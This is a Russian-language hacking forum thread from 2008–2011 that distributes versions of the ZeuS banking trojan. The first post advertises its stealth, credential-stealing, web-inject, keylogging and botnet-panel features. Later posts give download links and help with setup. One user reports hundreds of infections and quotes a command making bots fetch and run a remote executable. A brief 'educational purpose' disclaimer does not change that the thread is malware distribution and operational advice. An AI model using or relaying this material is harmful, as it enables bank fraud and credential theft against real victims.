1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Разные версии Zeus

Тема в разделе "Stealers|:|Formgrabbers|:|Keyloggers", создана пользователем Mari00, 14 мар 2008.

  1. Mari00
    Mari00 Guest
    ZeuS - Шпионское ПО (Spyware, далее "бот") для 32-х разрядной MS Windows 2000/XP+ служит для управления компьютерами жертв и получения с них информации при помощи ведения логов.

    ZeuS состоит из трех частей:
    Панель управления, которая устанавливается на сервер(а).
    Билдер, является приложением для Windows, служит для задания конфигурации бота.
    Бот, является приложением для Windows, но уже запускается на компьютере жертвы.
    Внимание! В зависимости от количества активных ботов, сборки, и настройки, вам понадобится от обычного хостинга до мощного сервера или серверов.

    ZeuS имеет следующие основные возможности и свойства (здесь приведен полный список, в вашей сборке часть этого списка может отсутствовать):
    Бот:
    Написан на VC++ 8.0, без использования RTL и т.д., на чистом WinAPI, за счет этого достигается маленький размер (10-25Кб, зависит от сборки).
    Не имеет собственного процесса, за счет этого нельзя обнаружить в списке процессов.
    Обход большинства фаерволов (включая популярный Outpost Firewall версий 3, 4, но сущетвует временная небольшая проблема с антишпионом). Не дает гарантии беспрепятственного приема входящих соединений.
    Сложно обнаружить поиском/анализом, бот устанавливается жертве и создает файл с временем системных файлов и произвольным размером.
    Работает в лимитированных учетных записях Windows (работа в гостевой учетной записи в настоящее время не поддерживается).
    Невидим для экваристики антивирусов, тело бота зашифровано.
    Некоем образом не создает подозрения на свое присутствие, если вы это не захотите. Здесь имеется ввиду то, что любят делать многие авторы spyware: выгрузка фаерволов, антивирусов, запрет на их обновление, блокировка Ctrl+Alt+Del и т.д.
    Блокировка Windows Firewall (данная функция требуется только для беспрепятственного приема входящих соединений).
    Все свои настройки/логи/команды бот хранит/принимает/передает в зашифрованном виде по HTTP(S) протоколу. (т.е. в текстовом виде данные будете видеть только вы, все остальное бот<->сервер будет выглядеть как мусор).
    Обнаружение NAT при помощи проверки своего IP через указанный вами сайт.
    Отдельный файл конфигурации, что позволяет себя защитить от потери ботнета в случаи недоступности основного сервера. Плюс дополнительные (резервные) файлы конфигурации, к которым бот будет обращаться, когда не будет доступен основной файл конфигурации. Эта система гарантирует выживание вашей ботнета в 90% случаях.
    Возможность работать с любыми браузерами/программами работающими через wininet.dll (Internet Explorer, AOL, Maxton и т.д.):
    Перехват POST-данных + перехват нажатых клавиш (включая вставленные данные из буфера обмена).
    Прозрачный URL-редирект (на фейк-сайты и т.д.) c заданием простейших условий редиректа (например: только при GET или POST запросе, при наличии или отсутствии определенных данных в POST-запросе).
    Прозрачная HTTP(S) подмена содержимого (Веб-инжект, который позволяет подменять не только HTML страницы, но и любой другой тип данных). Подмена задается при помощи указания масок подмены.
    Получение содержимого нужной страницы с исключением HTML-тегов. Основано на Веб-инжекте.
    Настраиваемый TAN-граббер для любых стран.
    Получения списка вопросов и ответов в банке "Bank Of America" после успешной авторизации.
    Удаление нужных POST-данных на нужных URL.
    ИДЕАЛЬНОЕ РЕШЕНИЕ ДЛЯ ВИРТУАЛЬНЫХ КЛАВИАТУР: После захода на нужную URL, происходит получение скриншота в области экрана, где была нажата левая кнопка мыши.
    Получение сертификатов из хранилища "MY" (сертификаты с пометкой "Не экспортируемый" не экспортируются корректно) и его очистка. После это любой импортируемый сертификат будет сохранен на сервер.
    Перехват логина/пароля протоколов POP3 и FTP в независимости от порта и запись его в лог только при удачной авторизации.
    Изменение локального DNS, удаление/добавление записей в файл %system32%\drivers\etc\hosts, т.е. сопоставление указанного домена с указанным IP для WinSocket.
    Сохраняет содержимое Protected Storage при первом запуске на компьютере.
    Удаляет Сookies из кэша Internet Explorer при первом запуске на компьютере.
    Поиск на логических дисках файлов по маске или загрузка конкретного файла.
    Запись только что посещенных страницы при первом запуске на компьютере. Полезен при установки через сплойты, если вы покупаете загрузки у подозрительного сервиса, можно узнать что грузится еще параллельно.
    Получение скриншота с компьютера жертвы в реальном времени, компьютер должен находится вне NAT.
    Прием команд от серверной части и отправка отчета назад об успешном выполнении. (В настоящее время запуск локального/удаленного файла, немедленное обновление файла конфигурации, уничтожение ОС).
    Socks4-сервер.
    HTTP(S) PROXY-сервер.
    Обновление бота до последней версии (URL новой версии прописывается в файле конфигурации).


    Панель управления:
    Для работы требуется PHP + MySQL.
    Простой инсталлятор (обычно хватает ввода данных юзера MySQL и нажатия кнопки 'Install').
    Многопользовательский режим, каждому пользователю можно задать определенные права доступа.
    Статистика установок(инсталлов, заражений).
    Статистика ботов находящихся в онлайн.
    Разделение ботнета на сабботнеты.
    Обзор онлайновых ботов (так же возможен фильтр)
    Просмотр скриншота в реальном времени.
    Просмотр и проверка Sock4.
    Время нахождения бота в онлайн.
    Скорость соединения (только для ботов вне NAT).
    Хранении логов в базе данных. Это дает следующие преимущества:
    Поиск логов по фильтру содержимого.
    Поиск логов по шаблонам с выделением нужных POST данных (например позволяет выделять на сайте http://rambler.ru/ только логи и пароль, отбрасывая при поиски все остальные данные).
    Хранение логов в зашифрованных файлах, в структуре директорий ботнет\страна\ID компьютера.
    Отдача команд ботам (так же возможен фильтр).
    При знании PHP вы можете самостоятельно перенастроить панель управления по вашем вкусу.

    Билдер:
    Написан на VC++ 8.0, без использования RTL и т.д. на чистом WinAPI, за счет этого достигается маленький размер (зависит от сборки, в сборке с декодером логов размер будет более 400кб, т.к. будет включена база стран по IP).
    Просмотр статуса текущей системы, в качестве теста бота вы можете запустить его на своем компьютере, а потом нажатием одной кнопки удалить его.
    Декодер логов, с распределением по странам.
    Билдер файла конфигурации (шифрованного) и самого бота.
    Полиморфный криптор BETA. В настоящее время находится на стадии тестирования, и не гарантирует сто процентную защиту от антивурсов. Но гарантировано доведение данной функции до ума в ближайшее время.
    UnHidden Content:
    [HIDER="3"]Pass: xaker.nameСкачать
    [/HIDER]
     
    14 мар 2008
  2. flem
    flem .адуь Новичок
    Симпатии:
    38
    ZEUS_Version_1.0.5.9

    думаю обойдемся без описалово )))
    скачать
    пас
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 5 or greater.**
     
    5 июл 2008
    2 пользователям это понравилось.
  3. flem
    flem .адуь Новичок
    Симпатии:
    38
    ZEUS_Version_1.0.6.8

    http://webfile.ru/2114152
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 20 or greater.**
     
    Последнее редактирование модератором: 2 авг 2008
    25 июл 2008
    2 пользователям это понравилось.
  4. flem
    flem .адуь Новичок
    Симпатии:
    38
    11 авг 2008
    1 человеку нравится это.
  5. flem
    flem .адуь Новичок
    Симпатии:
    38
    ZEUS 1.0.7.0

    тыц

    зы шрорит когда вылазит эта табличка "нужно минимум 5 сообшений"((


    //Тему почистил и закрепил.// Onthar
    Помните! Данный материал выложен только с образовательной целью,
    и использование его не для обучения может привести
    к уголовной ответственности.
     
    Последнее редактирование модератором: 13 ноя 2008
    13 ноя 2008
    2 пользователям это понравилось.
  6. logitechru
    logitechru Новичок
    Симпатии:
    0
    есть ли у когонить версия работающая не только в ie, но и в opera?
     
    Последнее редактирование: 8 янв 2009
    8 янв 2009
  7. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    эмм.. это тебе сплойты нужны под оперу, прежде чем соваться куда-то, неплохо было бы поучить терминологию.
     
    8 янв 2009
  8. rabo4ii
    rabo4ii Новичок
    Симпатии:
    0
    пользуюсь hostland.su
    при установке панели управления, пишет:

    Failed to write row in table 'ip2c': User 'user' has exceeded the 'max_questions' resource (current value: 40000)

    как исправить? это от хостинга зависит? какой посоветуете под зевс?
     
    24 мар 2009
  9. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    приватный.

    Смысл ставить зевса на бесплатный хостинг??? Только проблем на задницу схлапотать можно.
     
    24 мар 2009
  10. flem
    flem .адуь Новичок
    Симпатии:
    38
    скачять
    webfile.ru
    depositfiles.com
    sendspace.com

    ПС я непроверял.. хоть и написано правдоподобно но лутше зверя создовайте на виртуалке или дедике!!!
     
    2 апр 2009
  11. GLOOM
    GLOOM Новичок
    Симпатии:
    0
    НЕ-ПРАВ-ДА
    устанавливается только зазенденная
     
    2 апр 2009
  12. exzt
    exzt Новичок
    Симпатии:
    0
    народ, может кто ни будь дать более подробную информацию по зевсу,
    юзаю 1,2,4,2 версию, админку поставил без проблем, с конфигом билдера не много поковырялся но вроде настроил,
    за пол дня уже около 300 инсталов, +-100 в онлайне постоянно,
    вне NAТ +-50 с доступными соксами,
    конкретно хочу узнать как их отправить на партнерку по 1 разу в сутки,
    и как грузить боту с сервера еще что нибудь,пробовал давать такую команду
    rexec http://сайт.ру/web/файл.ехе
    файл криптованный,но походу комманды не принимают,
    пускай будет платно,но полная инфа
     
    14 окт 2009
  13. flem
    flem .адуь Новичок
    Симпатии:
    38
    ZeuS 1.2.7.11

    нашол в пабле.. кавыряйте сами каму надо.. ну или делайте билд на виртуалке

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 1 or greater.**
     
    20 окт 2009
  14. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    30 мар 2010
  15. onthar
    onthar Команда форума Админ
    Симпатии:
    396
    Последнее редактирование: 19 сен 2010
    19 сен 2010
  16. -=D[1]n=-
    -=D[1]n=- Новичок
    Симпатии:
    0
    BuxIx стоит на самом новом движке Zeus™2.8
     
    27 ноя 2010
  17. pomaho
    pomaho Новичок
    Симпатии:
    0
    На бесплатном серваке сразу после установки панели управления, сайт блокируется. Это не реально попробовать на бесплатном хостинге?
     
    15 дек 2010
  18. Iindigo
    Iindigo ВестникЪ Продвинутый
    Симпатии:
    69
    Благодари их, что они просто прикрыли твой сайт, а не отправили данные в соответствующие органы. Иначе получится как у того чувака из Вконтакте:

     
    15 дек 2010
  19. pomaho
    pomaho Новичок
    Симпатии:
    0
    А в общем-то и ничего такого и не сделал же вроде :) просто последовал инструкции ):
     
    15 дек 2010
  20. ZUNAMI777
    ZUNAMI777 Продвинутый
    Симпатии:
    1
    Zeus 1.3.2.1 panel + 1.3.1.1 build

    [​IMG]

    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 10 or greater.**
     
    4 янв 2011

Поделиться этой страницей

Загрузка...